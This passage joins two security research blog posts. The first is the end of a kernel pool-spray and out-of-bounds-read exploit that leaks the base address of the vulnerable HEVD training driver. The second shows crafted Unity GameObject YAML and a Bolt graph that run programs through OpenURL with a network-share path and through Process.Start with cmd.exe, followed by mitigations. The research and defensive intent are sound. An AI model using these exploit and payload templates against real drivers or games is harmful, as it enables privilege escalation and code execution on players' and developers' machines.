// Fill the holes in the NonPagedPoolNx of 0x80 bytes
void memLeak(HANDLE driverHandle)
{
  // Array to manage handles opened by CreateEventA
  HANDLE eventObjects[5000];

  // Spray 5000 objects to fill the new page
  for (int i = 0; i < 5000; i++)
  {
    // Create the objects
    HANDLE tempHandle = CreateEventA(
      NULL,
      FALSE,
      FALSE,
      NULL
    );

    // Assign the handles to the array
    eventObjects[i] = tempHandle;
  }

  // Check to see if the first handle is a valid handle
  if (eventObjects[0] == NULL)
  {
    printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

    // Close half of the handles
    for (int i = 0; i < 5000; i += 2)
    {
      BOOL tempHandle1 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle1)
      {
        printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    printf("[+] Poked holes in the new pool page!\n");

    // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
    // kLFH should automatically fill the freed holes with the UAF objects
    DWORD bytesReturned;

    for (int i = 0; i < 2500; i++)
    {
      DeviceIoControl(
        driverHandle,
        0x00222053,
        NULL,
        0,
        NULL,
        0,
        &bytesReturned,
        NULL
      );
    }

    printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

    // Close the rest of the event objects
    for (int i = 1; i < 5000; i += 2)
    {
      BOOL tempHandle2 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle2)
      {
        printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    // Array to store the buffer (output buffer for DeviceIoControl) and the base address
    unsigned long long outputBuffer[100];
    unsigned long long hevdBase;

    // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
    // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

    for (int i = 0; i < 100; i++)
    {
      // Return buffer
      DWORD bytesReturned1;

      DeviceIoControl(
        driverHandle,
        0x0022204f,
        NULL,
        0,
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned1,
        NULL
      );

    }

    printf("[+] Successfully triggered the out-of-bounds read!\n");

    // Parse the output
    for (int i = 0; i < 100; i++)
    {
      // Kernel mode address?
      if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
      {
        printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
        printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

        // Store the variable for future usage
        hevdBase = outputBuffer[i] - 0x880CC;
        break;
      }
    }
  }
}

void main(void)
{
  // Open a handle to the driver
  printf("[+] Obtaining handle to HEVD.sys...\n");

  HANDLE drvHandle = CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver",
    GENERIC_READ | GENERIC_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (drvHandle == (HANDLE)-1)
  {
    printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    memLeak(drvHandle);
  }
}

Conclusion

Kernel exploits from browsers, which are sandboxed, require such leaks to perform successful escalation of privileges. In part two of this series we will combine this bug with HEVD’s pool overflow vulnerability to achieve a read/write primitive and perform successful EoP! Please feel free to reach out with comments, questions, or corrections!

Peace, love, and positivity :-)

Hacking Unity Games with Malicious GameObjects

At IncludeSec our clients are asking us to hack on all sorts of crazy applications from mass scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass scale video games so we had a chance to do some research and came up with what we believe to be a novel attack against Unity-powered games!

Specifically, this post will outline:

  • Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
  • Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
  • How game developers can mitigate the risk.

Unity has also published their own blog post on this subject. Be sure to check that out for their specific recommendations and how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

  • GameObjects are entities in Unity that can have any number of components attached.
  • Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
  • Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
  • AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle")

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in a near-future augmented-reality, cyberpunk, ready-player-1 kind of world, an attacker may seek to inject things into a user’s reality to confuse, distract, or annoy them, and that might cause real-world harm.

So, how can non-script assets get code execution?

Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used on Unity’s built-in UI components (such as Buttons) for event handlers (like onClick). Additionally, you can add events such as PointerClick, PointerEnter, Scroll, etc. to objects using an EventTrigger component.

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo along with some experimenting to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction — they can call any method in a loaded assembly. You can skip to exploitation below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

  • eventID — This is specific to EventTriggers (rather than UI components.) It specifies the type of event, PointerClick, PointerHover, etc. PointerClick is “4”.
  • m_TargetAssemblyTypeName — this is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form: namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all Unity engine stuff as well as a lot of .NET stuff.
  • m_CallState — Determines when the event triggers — only during a game, or also while using the Unity Editor:
    • 0 – UnityEventCallState.Off
    • 1 – UnityEventCallState.EditorAndRuntime
    • 2 – UnityEventCallState.RuntimeOnly
  • m_Mode — Determines the argument type of the called function.
    • 0 – EventDefined
    • 1 – Void,
    • 2 – Object,
    • 3 – Int,
    • 4 – Float,
    • 5 – String,
    • 6 – Bool
  • m_Target — Specify the Unity object instance that the method will be called on. Specifying m_Target: {fileID: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things™. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file, and wait for the game client to trigger the event. OpenURL will then download and execute the payload. 

Below is the event definition I used  in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be hosted on the internet, but I hosted it on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>
int main() {
  FILE* fp = fopen("/tmp/hello", "w");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!) Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*\((string|int|bool|float) [A-Za-z\w_]*\)

After poring over the 426 discovered methods, I fell short of getting completely arbitrary code exec from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things™. This is just a small sampling:

  • Unity.CodeEditor.CodeEditor.SetExternalScriptEditor(): Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
  • PlayerPrefs.DeleteAll(): Delete all save games and other stored data.
  • UnityEditor.FileUtil.UnityDirectoryDelete(): Invokes Directory.Delete() on the specified directory.
  • UnityEngine.ScreenCapture.CaptureScreenshot(): Takes a screenshot of the game window to a specified file. Will automatically overwrite the specified file. Can be written to UNC paths in Windows.
  • UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs(): Add flags to be passed to the Il2Cpp compiler.
  • UnityEditor.BuildPlayerWindow.BuildPlayerAndRun(): Trigger the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
  • Application.Quit(), EditorApplication.Exit(): Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some of these systems are more powerful than others. I will focus on Bolt as an example since it’s pretty popular, Unity acquired it, and it’s now free.

This attack vector was proposed on Peter Clemenko’s blog I mentioned earlier, but it focused on malicious entity injection — I think it should be clarified that, using Bolt, it’s possible for imported GameObjects to achieve arbitrary code execution as well, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before inclusion in their game — first evaluating the asset creator’s trustworthiness before importing it into their project, then reviewing it (more or less carefully depending on how much you trust the creator). 

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double check that Unity validates HTTPS certificates on all platforms your game runs — do this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this creates an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle. 

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third-parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (I’m aware of EventTriggers and various UI elements). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a whitelist of methods Bolt is allowed to call, and then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.” Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended; the surface area is just too large and it’s likely something important will be missed, though a combination of whitelist and blacklist may be possible with high confidence.

In general, game developers need to decide how much protection they want to add at the app layer versus leaving the risk decision to the end user’s own judgement about which mods to run, just as it’s on users to decide which executables they download. That’s fair, but it might be a good idea to at least give gamers a heads up that this could be dangerous, via documentation and notifications in the UI layer. They may not expect that mods could do any harm to their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about Unity’s fix for this and their recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.
